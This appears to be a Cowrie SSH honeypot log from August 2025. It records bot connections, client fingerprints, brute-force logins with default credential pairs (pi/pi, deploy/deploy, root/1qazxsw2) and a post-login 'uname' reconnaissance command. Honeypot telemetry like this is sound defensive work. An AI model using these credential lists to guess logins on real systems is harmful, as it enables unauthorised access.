{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54610,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ec07d449af6","protocol":"ssh","message":"New connection: 212.227.235.229:54610 (1.2.3.4:22) [session: 4ec07d449af6]","sensor":"my-vps","timestamp":"2025-08-28T03:35:30.876168Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47618,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a5ae3312459","protocol":"ssh","message":"New connection: 212.227.235.229:47618 (1.2.3.4:22) [session: 0a5ae3312459]","sensor":"my-vps","timestamp":"2025-08-28T03:35:32.045329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:32.046776Z","src_ip":"212.227.235.229","session":"0a5ae3312459"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:32.294872Z","src_ip":"212.227.235.229","session":"0a5ae3312459"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:33.040490Z","src_ip":"212.227.235.229","session":"0a5ae3312459"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":33367,"dst_ip":"1.2.3.4","dst_port":22,"session":"39a7909d76c4","protocol":"ssh","message":"New connection: 45.125.211.194:33367 (1.2.3.4:22) [session: 39a7909d76c4]","sensor":"my-vps","timestamp":"2025-08-28T03:35:33.286055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:33.296065Z","src_ip":"45.125.211.194","session":"39a7909d76c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:33.497340Z","src_ip":"45.125.211.194","session":"39a7909d76c4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:34.291085Z","src_ip":"212.227.235.229","session":"0a5ae3312459"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:34.326655Z","src_ip":"45.125.211.194","session":"39a7909d76c4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:35.537705Z","src_ip":"45.125.211.194","session":"39a7909d76c4"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50780,"dst_ip":"1.2.3.4","dst_port":22,"session":"379b6a63daa6","protocol":"ssh","message":"New connection: 194.233.79.134:50780 (1.2.3.4:22) [session: 379b6a63daa6]","sensor":"my-vps","timestamp":"2025-08-28T03:35:43.402942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:43.520772Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:43.678364Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:35:44.634815Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:35:45.431937Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:35:45.432660Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:46.260065Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:46.261277Z","src_ip":"194.233.79.134","session":"379b6a63daa6"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":50817,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc248efbf4be","protocol":"ssh","message":"New connection: 45.125.211.194:50817 (1.2.3.4:22) [session: fc248efbf4be]","sensor":"my-vps","timestamp":"2025-08-28T03:35:48.113975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:48.120863Z","src_ip":"45.125.211.194","session":"fc248efbf4be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:48.334100Z","src_ip":"45.125.211.194","session":"fc248efbf4be"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink123","message":"login attempt [flink/flink123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:49.167607Z","src_ip":"45.125.211.194","session":"fc248efbf4be"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:35:50.380044Z","src_ip":"45.125.211.194","session":"fc248efbf4be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60696,"dst_ip":"1.2.3.4","dst_port":22,"session":"96166cee2d3f","protocol":"ssh","message":"New connection: 212.227.125.160:60696 (1.2.3.4:22) [session: 96166cee2d3f]","sensor":"my-vps","timestamp":"2025-08-28T03:35:58.496761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:35:58.497444Z","src_ip":"212.227.125.160","session":"96166cee2d3f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:35:58.722645Z","src_ip":"212.227.125.160","session":"96166cee2d3f"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:35:59.401427Z","src_ip":"212.227.125.160","session":"96166cee2d3f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:00.628921Z","src_ip":"212.227.125.160","session":"96166cee2d3f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11289,"dst_ip":"1.2.3.4","dst_port":22,"session":"10369de07cc9","protocol":"ssh","message":"New connection: 45.125.211.194:11289 (1.2.3.4:22) [session: 10369de07cc9]","sensor":"my-vps","timestamp":"2025-08-28T03:36:02.897566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:02.916772Z","src_ip":"45.125.211.194","session":"10369de07cc9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:03.108319Z","src_ip":"45.125.211.194","session":"10369de07cc9"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:03.949119Z","src_ip":"45.125.211.194","session":"10369de07cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42904,"dst_ip":"1.2.3.4","dst_port":22,"session":"0430cd329258","protocol":"ssh","message":"New connection: 212.227.125.160:42904 (1.2.3.4:22) [session: 0430cd329258]","sensor":"my-vps","timestamp":"2025-08-28T03:36:04.284348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:04.285123Z","src_ip":"212.227.125.160","session":"0430cd329258"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:04.500964Z","src_ip":"212.227.125.160","session":"0430cd329258"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:05.153067Z","src_ip":"212.227.125.160","session":"0430cd329258"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:05.159749Z","src_ip":"45.125.211.194","session":"10369de07cc9"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:06.371537Z","src_ip":"212.227.125.160","session":"0430cd329258"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53344,"dst_ip":"1.2.3.4","dst_port":22,"session":"88497c816118","protocol":"ssh","message":"New connection: 212.227.125.160:53344 (1.2.3.4:22) [session: 88497c816118]","sensor":"my-vps","timestamp":"2025-08-28T03:36:10.063802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:10.064725Z","src_ip":"212.227.125.160","session":"88497c816118"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:36:10.283329Z","src_ip":"212.227.125.160","session":"88497c816118"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T03:36:10.941424Z","src_ip":"212.227.125.160","session":"88497c816118"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:36:12.163000Z","src_ip":"212.227.125.160","session":"88497c816118"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.60","src_port":45212,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8afb814f231","protocol":"ssh","message":"New connection: 167.94.138.60:45212 (1.2.3.4:22) [session: e8afb814f231]","sensor":"my-vps","timestamp":"2025-08-28T03:36:14.438277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:14.709734Z","src_ip":"167.94.138.60","session":"e8afb814f231"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-28T03:36:14.710638Z","src_ip":"167.94.138.60","session":"e8afb814f231"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":17217,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e2553907544","protocol":"ssh","message":"New connection: 45.125.211.194:17217 (1.2.3.4:22) [session: 2e2553907544]","sensor":"my-vps","timestamp":"2025-08-28T03:36:17.657416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:36:17.673860Z","src_ip":"45.125.211.194","session":"2e2553907544"}
